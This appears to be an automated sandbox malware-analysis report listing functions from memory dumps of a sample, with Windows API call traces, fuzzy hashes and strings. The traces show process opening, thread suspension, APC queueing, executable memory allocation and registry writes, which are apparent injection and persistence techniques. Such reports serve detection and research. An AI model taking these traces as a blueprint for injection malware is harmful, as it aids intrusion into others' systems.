  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
